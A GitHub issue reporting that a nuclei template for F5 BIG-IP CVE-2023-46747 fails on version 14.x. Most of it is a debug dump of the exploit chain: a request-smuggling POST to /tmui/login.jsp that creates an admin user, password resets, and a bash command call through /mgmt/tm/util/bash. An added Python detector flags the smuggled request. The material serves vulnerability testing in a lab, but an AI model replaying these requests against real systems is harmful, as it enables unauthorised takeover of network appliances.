projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License

CVE-2023-46747 template failed to test on version 14.x #8701

Open W01fh4cker opened 9 months ago

W01fh4cker commented 9 months ago

Issue description:

When I built a local environment to test the f5-big-ip vulnerability CVE-2023-46747, both the 15.x and 16.x versions of f5-big-ip could be reproduced successfully, but the 14.x version of f5-big-ip failed to reproduce. The f5-big-ip version I tested is 14.1.2.6.

Anything else:

Next is the result of nuclei debug:

C:\Users\Administrator\CVE-2023-46747>nuclei.exe -u https://192.168.149.129:8443 -t CVE-2023-46747.yaml --debug > test.txt

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.2

                projectdiscovery.io

[WRN] Found 12 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.0.2 (outdated)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] New templates added in latest release: 25
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.149.129:8443/tmui/login.jsp

POST /tmui/login.jsp HTTP/1.1
Host: 192.168.149.129:8443
Transfer-Encoding: chunked, chunked
Content-Type: application/x-www-form-urlencoded

204
HTTP/1.1/tmui/Control/form      127.0.0.1       localhost       localhostP
Tmui-Dubbuf
BBBBBBBBBBB
REMOTEROLE0�
        localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=ZwdUY&name_before=&passwd=M6seB3j8CnrN&passwd_before=&finished=x&finished_before=�
0

[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.149.129:8443/tmui/login.jsp

HTTP/1.1 200 OK
Content-Length: 6950
Cache-Control: no-cache, must-revalidate
Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data:  http://127.4.1.1 http://127.4.2.1
Content-Type: text/html;charset=utf-8
Date: Sun, 26 Nov 2023 19:42:30 GMT
F5-Login-Page: true
Pragma: no-cache
Server: Apache
Set-Cookie: JSESSIONID=B54864AAFEB1852BEE2350721085848D; Path=/tmui; Secure; HttpOnly
Strict-Transport-Security: max-age=16070400; includeSubDomains
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>BIG-IP&reg; - bigip1 (192.168.149.129)</title>
        <meta http-equiv="content-type" content="text/html; charset=utf-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta http-equiv="pragma" content="no-cache" />
    <meta http-equiv="expires" content="-1" />
        <meta name="copyright" content="(c) Copyright 1996-2018, F5 Networks, Inc., Seattle, Washington. All rights reserved." />
        <meta name="description" content="BIG-IP&reg; Configuration Utility" />
        <meta name="author" content="F5 Networks, Inc." />
        <meta name="robots" content="noindex,nofollow" />
    <link rel="Shortcut Icon" type="image/x-icon" href="/xui/common/images/favicon.ico" />
    <link rel="stylesheet" type="text/css" href="tmui/login/css/login.css?" />
    <script type="text/javascript" src="/xui/common/scripts/utility.js?"></script>

        <script type="text/javascript" charset="utf-8">
                // Break out of the XUI wrapper or frameset
        if (window.location != window.top.location) {
            window.top.location = window.location;
        }

                window.onload = function(e) {
                        // Display error modal if necessary (but don't show it if they've failed authentication
                        // because they just saw the message on the original page load).

                        // Delete some state-preserving cookies if the user has logged out (doesn't have a BIGIPAuthCookie)
                        // Also delete these state cookies if we're rebooting.
                        var authCookieExists = false;
                        //Delete partition & folder cookies, no matter what the situation, to handle cases
                        // where the user's folder/partition permissions may have been changed. bug 415304
                        delCookie("F5_CURRENT_PARTITION");
            delCookie("F5_CURRENT_FOLDER");

                        if ( !authCookieExists || window.location.pathname.indexOf('reboot') != -1) {
                                deleteStatefulCookies();
                        }
                        // Reboot
                        if (window.location.pathname.indexOf('reboot') != -1) {
                                frames['contentframe'].location.replace(path_rebootModal);
                                document.getElementById('legallink').style.display = 'none';
                        }
                        // Welcome
                        else {
                                frames['contentframe'].location.replace('/tmui/tmui/login/welcome.jsp');
                                var loginFormObj = document.getElementById('loginform');
                                loginFormObj.style.display = 'block';
                                var msgText;
                                switch (getUrlValue('msgcode')) {
                                        case "1":
                                        msgText = 'Login failed';
                                        break;
                                        case "2":
                                        msgText = 'Your credentials are no longer valid. Please log in again.';
                                        break;
                                        case "3":
                                        msgText = 'You have been logged out. Please log in again.';
                                        break;
                                        case "4":
                                        msgText = 'Remote authentication server unreachable; local authentication failed.';
                                        break;
                                        case "5":
                                        msgText = 'Password changed successfully.';
                                        break;
                                }
                                if (msgText) {
                                        var msgObj = document.getElementById('message');
                                        msgObj.style.display = 'block';
                                        msgObj.innerHTML = msgText;
                                }
                                // Focus on username field
                                var usernameObj = document.getElementById('username');
                                usernameObj.focus();
                                if (usernameObj.select) {
                                        usernameObj.select();
                                }
                        }
                };

                function deleteStatefulCookies() {
                        delCookie("F5_CURRENT_PARTITION");
            delCookie("F5_CURRENT_FOLDER");
                        delCookie("f5_refreshpage");
                        delCookie("f5currenttab");
                        delCookie("f5formpage");
                        delCookie("f5mainmenuopenlist");

                }

                function checkFormBeforeSubmit() {
                        // delete any stateful cookies if the username being submitted is different than the previously logged-in user.
                        var enteredUsername = document.getElementById('username').value;
                        var previousUsername = "";
                        if (enteredUsername != previousUsername) {
                                deleteStatefulCookies();
                        }
                        return true;
                }
    </script>
</head>
<body>
    <div id="wrapper">
        <div id="window">
            <div id="banner">
                <div id="logo">

                <!--[if gt IE 6]><!-->
                    <img src="tmui/login/images/logo_f5.png" alt="F5 Networks Logo">
                <!--<![endif]-->
                <!--[if IE 6]>
                    <img src="tmui/login/images/transparent.gif" style="filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='tmui/login/images/logo_f5.png',sizingMethod='auto');" alt="F5 Networks Logo">
                <![endif]-->

                </div>
                <h1>
                    BIG-IP
                    Configuration Utility</h1>
                <h2>F5 Networks, Inc.</h2>

            </div>
            <div id="sidebar">
                <div id="deviceinfo">
                    <label>Hostname</label>
                    <p title="bigip1">bigip1</p>
                    <label>IP Address</label>
                    <p title="192.168.149.129">192.168.149.129</p>
                </div>
                <p id="message" class="badtext"></p>
                <form id="loginform" name="loginform" action="logmein.html?" method="POST" onsubmit="return checkFormBeforeSubmit();" style="display: none;">
                    <label>Username</label>
                    <input type="text" class="login" name="username" id="username" tabindex="1" autocomplete="off" />
                    <label>Password</label>
                    <input type="password" class="login" name="passwd" id="passwd" tabindex="2" autocomplete="off" />
                    <button type="submit" tabindex="3">Log in</button>
                </form>
            </div>
            <iframe src="/xui/common/blank.html" id="contentframe" name="contentframe" frameborder="no" scrolling="auto"></iframe>
        </div>
        <div id="copyright">(c) Copyright 1996-2018, F5 Networks, Inc., Seattle, Washington. All rights reserved.<br />
                        <a id="legallink"
            href="tmui/login/legal.html"
            target="contentframe" class="smalltext">F5 Networks, Inc. Legal Notices</a>
        </div>
    </div>
        <div id="modal" style="display: none;">
                <div class="overlay"></div>
                <div class="content">
                        <p class="badtext">This BIG-IP system has encountered a configuration problem that may prevent the Configuration utility from functioning properly.</p>
                        <p>To prevent adverse effects on the system, F5 Networks recommends that you restrict your use of the Configuration utility to critical tasks only until the problem is resolved. Beware that attempting to modify your configuration in this state with the Configuration utility may cause your configuration to be overwritten.</p>
                        <button onclick="document.getElementById('modal').style.display='none';">Continue</button>
                </div>
        </div>
</body>
</html>

[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.149.129:8443/mgmt/tm/auth/user/ZwdUY

PATCH /mgmt/tm/auth/user/ZwdUY HTTP/1.1
Host: 192.168.149.129:8443
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Content-Length: 32
Authorization: Basic WndkVVk6TTZzZUIzajhDbnJO
Content-Type: application/json
Accept-Encoding: gzip

{"password": "zrvB3p0FrGJRhz"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.149.129:8443/mgmt/tm/auth/user/ZwdUY

HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 381
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 26 Nov 2023 19:42:31 GMT
Server: Apache
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: Basic realm="Enterprise Manager"
X-Frame-Options: SAMEORIGIN

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested.  Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
</body></html>
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.149.129:8443/mgmt/shared/authn/login

POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.149.129:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 51
Content-Type: application/json
Accept-Encoding: gzip

{"username":"ZwdUY", "password":"zrvB3p0FrGJRhz"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.149.129:8443/mgmt/shared/authn/login

HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 216
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data:  http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Sun, 26 Nov 2023 19:42:33 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block

{"code":401,"message":"Authentication failed.","originalRequestBody":"{\"username\":\"ZwdUY\",\"generation\":0,\"lastUpdateMicros\":0}","referer":"192.168.149.1","restOperationId":6544341,"kind":":resterrorresponse"}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.149.129:8443/mgmt/tm/util/bash

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.149.129:8443
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 41
Content-Type: application/json
X-F5-Auth-Token: {{token}}
Accept-Encoding: gzip

{"command":"run","utilCmdArgs":"-c id"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.149.129:8443/mgmt/tm/util/bash

HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 136
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data:  http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Sun, 26 Nov 2023 19:42:35 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: X-Auth-Token
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block

{"code":401,"message":"X-F5-Auth-Token does not exist.","referer":"192.168.149.1","restOperationId":6544407,"kind":":resterrorresponse"}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.149.129:8443/mgmt/tm/auth/user/ZwdUY

PATCH /mgmt/tm/auth/user/ZwdUY HTTP/1.1
Host: 192.168.149.129:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 32
Authorization: Basic WndkVVk6TTZzZUIzajhDbnJO
Content-Type: application/json
Accept-Encoding: gzip

{"password": "zrvB3p0FrGJRhz"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.149.129:8443/mgmt/tm/auth/user/ZwdUY

HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 381
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 26 Nov 2023 19:42:35 GMT
Server: Apache
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: Basic realm="Enterprise Manager"
X-Frame-Options: SAMEORIGIN

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested.  Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
</body></html>
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.149.129:8443/mgmt/shared/authn/login

POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.149.129:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Content-Length: 49
Content-Type: application/json
Accept-Encoding: gzip

{"username":"ZwdUY", "password":"M6seB3j8CnrN"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.149.129:8443/mgmt/shared/authn/login

HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 216
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data:  http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Sun, 26 Nov 2023 19:42:37 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block

{"code":401,"message":"Authentication failed.","originalRequestBody":"{\"username\":\"ZwdUY\",\"generation\":0,\"lastUpdateMicros\":0}","referer":"192.168.149.1","restOperationId":6544457,"kind":":resterrorresponse"}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.149.129:8443/mgmt/tm/util/bash

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.149.129:8443
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Content-Length: 41
Content-Type: application/json
X-F5-Auth-Token: {{token}}
Accept-Encoding: gzip

{"command":"run","utilCmdArgs":"-c id"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.149.129:8443/mgmt/tm/util/bash

HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 136
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data:  http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Sun, 26 Nov 2023 19:42:39 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: X-Auth-Token
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block

{"code":401,"message":"X-F5-Auth-Token does not exist.","referer":"192.168.149.1","restOperationId":6544515,"kind":":resterrorresponse"}
[INF] No results found. Better luck next time!
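A defender-side check for the request shape in the dump above, added here as an example and not code from the issue or the nuclei-templates project: it parses raw HTTP/1.1 requests the way a reverse proxy or WAF would see them and flags the duplicated Transfer-Encoding value together with the smuggled /tmui/Control/form body. The two sample requests are constructed from the dump with the binary bytes left out; the marker strings and paths are the ones visible above.

```python
from typing import List, Tuple

# Body markers taken from the smuggled chunk shown in the nuclei debug output above.
SMUGGLED_BODY_MARKERS = (
    "/tmui/Control/form",
    "REMOTEROLE",
    "handler=%2ftmui%2fsystem%2fuser%2fcreate",
)

def parse_request(raw: str) -> Tuple[str, List[Tuple[str, str]], str]:
    """Split a raw HTTP/1.1 request into request line, header pairs and body.
    Headers stay a list so a repeated header name is not collapsed."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body

def check_request(raw: str) -> List[Tuple[str, str]]:
    """Return (rule, detail) findings for one request; an empty list means clean."""
    request_line, headers, body = parse_request(raw)
    findings = []
    te_headers = [v for n, v in headers if n == "transfer-encoding"]
    te_values = [t.strip().lower() for v in te_headers for t in v.split(",")]
    # "chunked" may appear once and only as the final coding (RFC 9112 6.1);
    # repeating it serves only to make front-end and back-end parsers disagree.
    if te_values.count("chunked") > 1 or len(te_headers) > 1:
        findings.append(("duplicate-transfer-encoding", ", ".join(te_values)))
    method, _, rest = request_line.partition(" ")
    target = rest.split(" ", 1)[0]
    if method == "POST" and target.startswith("/tmui/login.jsp"):
        hits = [m for m in SMUGGLED_BODY_MARKERS if m in body]
        if hits:
            findings.append(("tmui-smuggled-control-form", "; ".join(hits)))
    return findings

# Constructed samples: the probe from the dump (binary bytes dropped) and a benign login.
PROBE_REQUEST = (
    "POST /tmui/login.jsp HTTP/1.1\r\n"
    "Host: 192.168.149.129:8443\r\n"
    "Transfer-Encoding: chunked, chunked\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "204\r\n"
    "HTTP/1.1/tmui/Control/form 127.0.0.1 localhost localhostP\r\n"
    "REMOTEROLE0 localhostadmin handler=%2ftmui%2fsystem%2fuser%2fcreate&name=ZwdUY\r\n"
    "0\r\n\r\n"
)
BENIGN_REQUEST = (
    "POST /tmui/login.jsp HTTP/1.1\r\n"
    "Host: 192.168.149.129:8443\r\n"
    "Content-Length: 29\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "username=admin&passwd=secret1"
)
```

Run `check_request` over requests replayed from a proxy or WAF log; the 14.x host in the issue answered the probe with a plain 200 login page, so the request itself, not the response, is the reliable thing to alert on.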

ritikchaddha commented 4 months ago

Hello @W01fh4cker, are you still facing any issues with this template? Please feel free to share more information.

W01fh4cker commented 4 months ago

> Hello @W01fh4cker, are you still facing any issues with this template? Please feel free to share more information.

Yes, this template is not applicable to all F5 versions. For specific information, please refer to https://twitter.com/joel_land/status/1729147886615818732 and https://xz.aliyun.com/t/12944. I tested the 14.x version with the vulnerability described in the official report, but could not exploit it successfully.